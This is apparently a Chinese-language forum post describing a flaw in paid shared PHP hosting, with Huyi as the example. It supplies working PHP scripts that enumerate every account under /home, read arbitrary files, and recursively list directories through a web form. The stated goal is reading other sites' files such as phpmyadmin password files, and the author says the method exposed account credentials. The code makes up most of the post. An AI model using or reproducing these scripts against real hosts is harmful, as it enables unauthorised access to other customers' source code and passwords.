|
PHP收费空间的一点小漏洞
大多数(能执行PHP的)收费空间都有此问题
以下以虎翼为例:
代码:
<?
$d=dir("/home");
echo "Handle:".$d->handle."<br>\n";
echo "Path:".$d->path."<br>\n";
while($entry=$d->read())
{
echo $entry."<br>\n";
}
$d->close();
?>
利用此test.php程序可以查看/home下所有文件,可以查看51.net的当前主机的全部用户
把"/home"改成"/"可以看到什么?你自己去看吧.别太紧张.紧张的在后面
HOME下的全是登陆帐号
HOME/.domain和
HOME/.trialdomain
下的全是三级域名
帐号里有很多都没空间,是空号。我反复试了。
三级域名是对应·A型虚拟主机的
例子(没敢用虎翼的)
http://tonylong.l1h.net/test.php
http://tonylong.l1h.net/test1.php
http://tonylong.l1h.net/test2.php
http://tonylong.l1h.net/test3.php
用aa.php读取文件原码
读取。。
<?
$fd=fopen("/home/*.*","r");
while($buffer=fgets($fd,4096))
{
echo $buffer;
}
fclose($fd);
?>
例子读取:/home/html/phpmyadmin/user_password.php的原码(这对网站威胁很大)http://tonylong.l1h.net/aa.php
用ss.php查询指定文件目录下的所有文件和文件夹
<?
function listdir($dir){
echo "<ul>";
$handle=opendir($dir);
echo "directory Handle:$handle<br>\n";
while ($sdir=readdir($handle)){
if(is_file("$dir/$sdir"))
echo "<li>$dir/$sdir";
if(is_dir("$dir/$sdir") and $sdir<>'.' and $sdir<>'..'){
echo "<li>$dir";
listdir("$dir/$sdir");
}
}
closedir($handle);
echo "</ul>";
}
if(!empty($dir)){
listdir($dir);
}
?>
<form action="test.php" method=post>
请输入查询路径:<input type=text name=dir size=50>
<input type=submit value="查询">
</form>
例子http://tonylong.l1h.net/ss.php
以上演示空间是l1h.net的免费空间
大家别攻击
还有perlhack 编的一整套.
反正我自己找到了我的虎翼帐号及密码。
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 
